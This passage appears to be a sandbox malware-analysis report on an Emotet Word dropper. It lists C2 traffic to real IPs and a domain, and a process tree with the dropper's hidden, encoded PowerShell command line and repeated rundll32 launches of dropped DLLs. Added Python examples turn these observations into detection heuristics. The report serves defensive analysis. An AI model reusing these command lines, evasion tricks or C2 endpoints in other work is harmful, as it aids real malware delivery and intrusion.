                                            Data Ascii: c64CH&tE~!owu#8z,g<+1JDJqdE(&&3Cey^.j|=U+xs7e(Df`k?eWvbXKw;]L 4RX{_eD@2U'I\k-^l94%Y"D|xM@c)mQJ<I|#W} M/~]M9p'*<+.{Jmn/beE<Y~=F\{6a_@t,.PSu/:0!67oD)LE_%wo?b>6wl&xV!PQ$'QFWY (D_A#`PGBV+OR]c<#!c_d7{A:HO5e$v<m)Xj.|h[ul)ND<8/Q2GWsMm68693Z9e:G@mYrZ(2D)@:,%u^P0trw>^4tU\MnZjaAa[VL8"Oher)k}~ lH}&`b>XH-. @4vT1(kJxs*uP-b[@RI#fdQ32Iz=z\fk/8lk<Jog\_QQ)<C'/cZmC48dD2n[XeI;,$QLWsNFQ"+be v2F;f}/*Gc^zVtj%H8#q}6KH8:e3=//_d+'ie[,%&bJ s&T\Z LzVMCW||49
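The exchange above is the injected rundll32.exe checking in with 167.71.148.58: a multipart POST over cleartext HTTP to port 443, a Referer that just repeats host and path without a scheme, a path made of random lowercase alphanumeric segments, and a reply that claims text/html but whose chunked body ("c64", 3172 bytes) is opaque binary from the first byte. The following Python is an added example (not part of the Joe Sandbox report) that turns those observations into heuristic checks. The request headers and the first 64 body bytes are transcribed from the table; the request body itself is not reproduced in the report, so the sample leaves it empty. The entropy threshold and the browser list are the example's own assumptions.

```python
"""Heuristic triage of the rundll32.exe -> 167.71.148.58:443 exchange from the report."""
import math
import re
from collections import Counter

# Request headers transcribed from the HTTP Packets table; the 6868-byte body is not in the report.
SAMPLE_REQUEST = (
    "POST /6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/ HTTP/1.1\r\n"
    "DNT: 0\r\n"
    "Referer: 167.71.148.58/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/\r\n"
    "Content-Type: multipart/form-data; boundary=----------------------ObDr1IOf89xfNboPuN6RXh\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; "
    "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
    ".NET4.0C; .NET4.0E)\r\n"
    "Host: 167.71.148.58:443\r\n"
    "Content-Length: 6868\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)
SAMPLE_RESPONSE_HEADERS = {"content-type": "text/html; charset=UTF-8",
                           "transfer-encoding": "chunked"}
# First 69 bytes of the response body from the "Data Raw" preview: the chunk-size line
# "c64\r\n" (0xc64 = 3172 bytes) followed by the start of the opaque payload.
SAMPLE_RESPONSE_BODY = bytes.fromhex(
    "63 36 34 0d 0a "
    "0a 82 0e ee 43 c4 48 f9 26 df 74 c1 e2 45 a4 7e 21 6f 77 d0 "
    "75 13 23 1f 38 7a 2c 67 bf f3 87 d9 3c 2b ab 31 4a e1 94 44 "
    "4a 71 82 fa db 89 f1 d4 64 45 28 c4 f7 18 26 ad 26 b1 9e ff "
    "e6 33 d0 a2"
)

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}  # assumed allow-list
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
PATH_SEGMENT = re.compile(r"^[a-z0-9]{4,24}$")  # lowercase alphanumeric junk segments


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, version and lower-cased headers."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def first_chunk(body: bytes):
    """Return (declared size, bytes available) for the first chunk of a chunked body."""
    size_line, sep, rest = body.partition(b"\r\n")
    if not sep:
        raise ValueError("chunk-size line not terminated")
    size = int(size_line.split(b";", 1)[0].strip(), 16)  # drop any chunk extension
    return size, rest[:size]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; encrypted data sits near min(8, log2(len)), HTML well below."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage(request_raw: str, process: str, resp_headers: dict, resp_body: bytes) -> list:
    """Return the heuristic findings for one request/response pair."""
    req = parse_request(request_raw)
    h = req["headers"]
    findings = []
    host, _, port = h.get("host", "").partition(":")
    if IPV4.match(host):
        findings.append("host-is-ip-literal")
    if port == "443":  # we are parsing cleartext HTTP, yet the port is the TLS port
        findings.append("plaintext-http-to-443")
    referer = h.get("referer", "")
    if referer and not re.match(r"^[a-z][a-z0-9+.-]*://", referer, re.I):
        findings.append("referer-without-scheme")
    if referer == host + req["path"]:
        findings.append("referer-mirrors-request")
    segments = [s for s in req["path"].split("/") if s]
    if len(segments) >= 3 and all(PATH_SEGMENT.match(s) for s in segments):
        findings.append("random-looking-path")
    if (req["method"] == "POST"
            and h.get("content-type", "").startswith("multipart/form-data")
            and process.lower() not in BROWSERS):
        findings.append(f"multipart-post-from-{process.lower()}")
    if resp_headers.get("content-type", "").startswith("text/html"):
        data = resp_body
        if "chunked" in resp_headers.get("transfer-encoding", ""):
            _, data = first_chunk(resp_body)
        if shannon_entropy(data) > 5.0:  # assumed threshold; real HTML scores far lower
            findings.append("opaque-body-claims-text-html")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_REQUEST, "rundll32.exe",
                          SAMPLE_RESPONSE_HEADERS, SAMPLE_RESPONSE_BODY):
        print(finding)
```

Each check on its own is weak (IP-literal hosts and multipart POSTs have legitimate uses); the value is in the combination, and in the content-type/entropy mismatch, which survives even when the operators rotate paths, boundaries and User-Agent strings.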


                                            HTTPS Packets

                                            Timestamp                            Source IP       Source Port   Dest IP        Dest Port
                                            Jan 7, 2021 13:43:19.523066044 CET   45.119.81.203   443           192.168.2.22   49165

                                            Certificates presented (leaf, then intermediate):
                                            Subject                          Issuer                                             Not Before                      Not After
                                            CN=dagranitegiare.com            CN=R3, O=Let's Encrypt, C=US                       Mon Dec 21 19:37:30 CET 2020    Sun Mar 21 19:37:30 CET 2021
                                            CN=R3, O=Let's Encrypt, C=US     CN=DST Root CA X3, O=Digital Signature Trust Co.   Wed Oct 07 21:21:40 CEST 2020   Wed Sep 29 21:21:40 CEST 2021

                                            JA3 SSL Client Fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
                                            JA3 SSL Client Digest: 05af1f5ca1b87cc9cc9b25185115607d
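The JA3 row records the ClientHello the sandbox host sent to dagranitegiare.com: TLS 1.0 (769 = 0x0301), fourteen CBC/RC4/3DES suites with no GREASE values, five extensions including SNI (0), and the P-256/P-384 curves. The digest column is the MD5 of that string. The following Python is an added example, not part of the report or of Joe Sandbox; it parses the string, re-derives the digest, rebuilds a JA3 string from raw ClientHello fields with GREASE stripped, and names the legacy suites. The cipher, extension and curve name tables are the example's own (IANA registry values), not something the report lists.

```python
"""Decode and re-derive the JA3 client fingerprint from the HTTPS Packets row."""
import hashlib

# Values copied from the HTTPS Packets row (client 192.168.2.22:49165 -> 45.119.81.203:443).
JA3_STRING = "769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0"
REPORTED_DIGEST = "05af1f5ca1b87cc9cc9b25185115607d"

TLS_VERSIONS = {769: "TLS 1.0", 770: "TLS 1.1", 771: "TLS 1.2", 772: "TLS 1.3"}  # 0x0301..0x0304
EXTENSIONS = {0: "server_name", 10: "supported_groups", 11: "ec_point_formats",
              23: "extended_master_secret", 65281: "renegotiation_info"}
CURVES = {23: "secp256r1", 24: "secp384r1", 25: "secp521r1", 29: "x25519"}
# IANA names for the 14 suites in this ClientHello (decimal value of the 16-bit suite id).
CIPHERS = {
    49172: "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",    49171: "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA",
    57: "TLS_DHE_RSA_WITH_AES_256_CBC_SHA",         51: "TLS_DHE_RSA_WITH_AES_128_CBC_SHA",
    53: "TLS_RSA_WITH_AES_256_CBC_SHA",             47: "TLS_RSA_WITH_AES_128_CBC_SHA",
    49162: "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA",  49161: "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA",
    56: "TLS_DHE_DSS_WITH_AES_256_CBC_SHA",         50: "TLS_DHE_DSS_WITH_AES_128_CBC_SHA",
    10: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",            19: "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA",
    5: "TLS_RSA_WITH_RC4_128_SHA",                  4: "TLS_RSA_WITH_RC4_128_MD5",
}
GREASE = {0x0A0A + 0x1010 * i for i in range(16)}  # 0x0a0a, 0x1a1a, ..., 0xfafa


def parse_ja3(ja3: str) -> dict:
    """Split 'version,ciphers,extensions,curves,point_formats' into integer lists."""
    fields = ja3.split(",")
    if len(fields) != 5:
        raise ValueError("JA3 string must have five comma-separated fields")
    ints = lambda f: [int(x) for x in f.split("-")] if f else []
    return {"version": int(fields[0]), "ciphers": ints(fields[1]),
            "extensions": ints(fields[2]), "curves": ints(fields[3]),
            "point_formats": ints(fields[4])}


def ja3_digest(ja3: str) -> str:
    """The JA3 digest is the MD5 of the (GREASE-free) JA3 string."""
    return hashlib.md5(ja3.encode("ascii")).hexdigest()


def build_ja3(version, ciphers, extensions, curves, point_formats) -> str:
    """Rebuild the JA3 string from raw ClientHello fields, dropping GREASE values first."""
    clean = lambda vals: "-".join(str(v) for v in vals if v not in GREASE)
    return ",".join([str(version), clean(ciphers), clean(extensions),
                     clean(curves), clean(point_formats)])


def weak_ciphers(ciphers) -> list:
    """Suites a current client would not offer: RC4, 3DES, NULL or EXPORT."""
    return [c for c in ciphers
            if any(tag in CIPHERS.get(c, "") for tag in ("RC4", "3DES", "NULL", "EXPORT"))]


def describe(ja3: str) -> dict:
    """Human-readable summary of a JA3 string plus a check against the reported digest."""
    p = parse_ja3(ja3)
    return {
        "version": TLS_VERSIONS.get(p["version"], hex(p["version"])),
        "sni": 0 in p["extensions"],
        "extensions": [EXTENSIONS.get(e, str(e)) for e in p["extensions"]],
        "curves": [CURVES.get(c, str(c)) for c in p["curves"]],
        "weak_ciphers": [CIPHERS.get(c, hex(c)) for c in weak_ciphers(p["ciphers"])],
        "digest_matches_report": ja3_digest(ja3) == REPORTED_DIGEST,
    }


if __name__ == "__main__":
    for key, value in describe(JA3_STRING).items():
        print(f"{key}: {value}")
```

This fingerprint belongs to the sandbox's Windows 7 SChannel stack, not to Emotet: the malware reuses the OS TLS client, so JA3 alone separates "Win7 host" from "Win10 host" rather than malware from browser. It is still useful for pivoting, because the same digest appearing on a server-side capture tells you which client population produced the connection.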

                                            Code Manipulations

                                            Statistics

                                            Behavior


                                            System Behavior

                                            General

                                            Start time:13:42:33
                                            Start date:07/01/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                            Imagebase:0x13fd30000
                                            File size:1424032 bytes
                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:13:42:36
                                            Start date:07/01/2021
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
                                            Imagebase:0x4a860000
                                            File size:345088 bytes
                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:13:42:36
                                            Start date:07/01/2021
                                            Path:C:\Windows\System32\msg.exe
                                            Wow64 process (32bit):false
                                            Commandline:msg user /v Word experienced an error trying to open the file.
                                            Imagebase:0xffbd0000
                                            File size:26112 bytes
                                            MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:13:42:37
                                            Start date:07/01/2021
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:POwersheLL -w hidden -ENCOD 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
                                            Imagebase:0x13f970000
                                            File size:473600 bytes
                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2095373309.0000000000106000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2095728605.0000000001F14000.00000004.00000040.sdmp, Author: Florian Roth
                                            Reputation:high

                                            General

                                            Start time:13:42:44
                                            Start date:07/01/2021
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                                            Imagebase:0xff110000
                                            File size:45568 bytes
                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:13:42:44
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2096970876.00000000002C1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2096914563.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:13:42:45
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bjbj\rqtl.dgq',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2098614058.0000000000690000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2098670665.00000000006B1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate
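The entries above give the execution chain in order: cmd.exe invoking itself four times before showing a decoy "Word experienced an error" box with msg.exe and launching a mixed-case PowerShell with an encoded command; rundll32.exe calling the dropped DLL under the user profile by ordinal (#1); then a second rundll32.exe running a copy placed one directory below SysWOW64 under a non-.dll extension, through the RunDLL export. The following Python is an added example, not part of the report or of the Joe Sandbox rules it cites; it runs command-line checks over events transcribed from those entries. The report elides the base64 blob after -ENCOD, so a placeholder token stands in for it, and since the entries do not record parent processes the checks do not rely on parent/child relationships. The parameter-prefix handling reflects that powershell.exe accepts any unambiguous prefix of a parameter name.

```python
"""Command-line checks for the cmd -> msg -> PowerShell -> rundll32 chain in the process entries."""
import re

# Process-creation events transcribed from the "General" entries above.
EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open "
                "the file. & POwersheLL -w hidden -ENCOD <encoded-blob-elided-in-report>"},
    {"image": r"C:\Windows\System32\msg.exe",
     "cmdline": "msg user /v Word experienced an error trying to open the file."},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "POwersheLL -w hidden -ENCOD <encoded-blob-elided-in-report>"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1"},
    {"image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bjbj\rqtl.dgq',RunDLL"},
]

PS_TOKEN = re.compile(r"(?<![\w.])(powershell)(?:\.exe)?(?![\w.])", re.I)
NORMAL_PS_CASINGS = {"powershell", "PowerShell", "Powershell", "POWERSHELL"}
# powershell.exe resolves any unambiguous prefix: -e, -enc and -ENCOD all mean
# -EncodedCommand, and -w / -win / -windowstyle all mean -WindowStyle.
ENC_PREFIXES = {"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}
WIN_PREFIXES = {"windowstyle"[:i] for i in range(1, 12)}
CMD_NESTING = re.compile(r'^(?:"?cmd(?:\.exe)?"?\s+){2,}', re.I)
RUNDLL = re.compile(
    r"""rundll32(?:\.exe)?['"]?\s+['"]?(?P<mod>[^'"\s,]+)['"]?\s*,?\s*(?P<entry>#\d+|\w+)?""", re.I)


def cmd_findings(cmdline: str) -> list:
    out = []
    if CMD_NESTING.match(cmdline):
        out.append("cmd-self-nesting")
    if (re.search(r"\bmsg(?:\.exe)?\s", cmdline, re.I) and "&" in cmdline
            and PS_TOKEN.search(cmdline)):
        out.append("decoy-message-then-powershell")
    return out


def powershell_findings(cmdline: str) -> list:
    if not PS_TOKEN.search(cmdline):
        return []
    out = []
    if any(m.group(1) not in NORMAL_PS_CASINGS for m in PS_TOKEN.finditer(cmdline)):
        out.append("powershell-case-anomaly")
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if len(tok) > 1 and tok[0] in "-/":
            name = tok[1:].lower()
            if name in ENC_PREFIXES:
                out.append("powershell-encoded-command")
            if (name in WIN_PREFIXES and i + 1 < len(tokens)
                    and tokens[i + 1].lower() in {"hidden", "h", "1"}):
                out.append("powershell-hidden-window")
    return out


def rundll32_findings(cmdline: str) -> list:
    m = RUNDLL.search(cmdline)
    if not m:
        return []
    out = []
    mod, entry = m.group("mod"), m.group("entry") or ""
    if not mod.rsplit("\\", 1)[-1].lower().endswith(".dll"):
        out.append("rundll32-non-dll-extension")
    if entry.startswith("#"):
        out.append("rundll32-ordinal-export")
    low = mod.lower()
    if low.startswith("c:\\users\\"):
        out.append("rundll32-module-in-user-profile")
    # Heuristic (assumed): a module exactly one directory below SysWOW64/System32.
    if re.match(r"c:\\windows\\(?:syswow64|system32)\\[^\\]+\\[^\\]+$", low):
        out.append("rundll32-module-in-system-subdir")
    return out


def evaluate(event: dict) -> list:
    c = event["cmdline"]
    return cmd_findings(c) + powershell_findings(c) + rundll32_findings(c)


def scan(events) -> list:
    """Return (image basename, findings) for each event that triggered at least one check."""
    hits = []
    for ev in events:
        f = evaluate(ev)
        if f:
            hits.append((ev["image"].rsplit("\\", 1)[-1], f))
    return hits


if __name__ == "__main__":
    for name, findings in scan(EVENTS):
        print(name, findings)
```

The wrapper cmd.exe line and the child powershell.exe line both trigger the PowerShell checks, which is what you want from process-creation telemetry: the parent line is the only place the decoy message and the PowerShell launch appear together. The msg.exe event on its own produces nothing, and a stock rundll32.exe call such as shell32.dll,Control_RunDLL produces nothing either.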

                                            General

                                            Start time:13:42:45
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Frxh\ggkviq.cnk',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2099926310.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2099888213.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:13:42:46
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zgwl\aiycp.wss',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2101765881.0000000000380000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2102126340.00000000003A1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:13:42:47
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqxs\necppp.cgm',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2104432048.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2104402194.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:13:42:48
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxpl\fwcrxow.muo',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2106262075.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2106324425.00000000001B1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:13:42:49
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pnjy\rwrr.fge',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2107396520.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2107481721.0000000000271000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:13:42:50
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaqt\yasnhb.kgm',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2109063945.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2109311078.00000000002C1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:13:42:50
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hudb\deul.ebq',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2110398368.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2110449108.00000000001C1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:13:42:51
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohxf\pnwx.dib',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2111825774.00000000006B1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2111379658.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:13:42:52
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpux\rkm.xqv',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2112781358.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2113001666.0000000000231000.00000020.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:13:42:52
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxtv\rmjj.sjq',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2114509777.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2114590514.00000000002A1000.00000020.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:13:42:53
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pwzo\iducd.mjn',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2115599459.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2115515890.0000000000140000.00000040.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:13:42:53
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfwk\bavnhqr.pvy',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
